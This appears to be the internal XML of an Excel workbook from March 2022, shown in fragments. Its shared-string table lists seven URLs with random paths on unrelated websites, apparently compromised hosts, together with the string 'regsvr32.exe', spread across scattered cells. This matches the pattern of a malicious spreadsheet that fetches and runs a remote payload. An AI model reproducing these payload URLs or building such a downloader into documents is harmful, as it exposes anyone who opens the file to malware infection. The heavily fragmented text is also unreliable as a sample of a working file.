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"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{295CFB54-B28F-4EF2-9351-EF84D4E20BA2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7" i="3" l="1"/>
  <c r="M11" i="3"/>
  <c r="O8" i="3"/>
  <c r="C8" i="3"/>
  <c r="I5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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="20" uniqueCount="20">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"https://www.alejandrovillar.com/MSL/eKDWjpa4OHRxpysOTFe/",</t>
  </si>
  <si>
    <t>"https://alejandrastamateas.com/web/ZxA3zHwsH3r/",</t>
  </si>
  <si>
    <t>"https://alexetaurore.com/wanted/pfFtzaJovICU81kfuUp/",</t>
  </si>
  <si>
    <t>"http://ayursoukhya.org/wp-includes/XI35qPGHvszZ1u/",</t>
  </si>
  <si>
    <t>"http://balibuli.hu/cgi-bin/WDDM0VHSK4VcOFmU/",</t>
  </si>
  <si>
    <t>"https://aldibiki.com/prettyPhoto/gLFRzQV0VunO/",</t>
  </si>
  <si>
    <t>"https://al-brik.com/vb-w/U/",</t>
  </si>
  <si>
    <t>regsvr32.exe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</si>
</sst>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55" sqref="AM55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12</v>
      </c>
      <c r="G14" s="2" t="s">
        <v>14</v>
      </c>
      <c r="I14" s="2" t="s">
        <v>16</v>
      </c>
      <c r="K14" s="2" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="16" spans="3:15" x14ac:dyDescent="0.25">
      <c r="F16" s="2" t="s">
        <v>13</v>
      </c>
      <c r="H16" s="2" t="s">
        <v>15</v>
      </c>
      <c r="J16" s="2" t="s">
        <v>17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D12" sqref="D12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="6" spans="7:17" x14ac:dyDescent="0.25">
      <c r="I6" t="s">
        <v>19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2022-03-15T16:50:13Z</dcterms:modified>
</cp:coreProperties>
</file>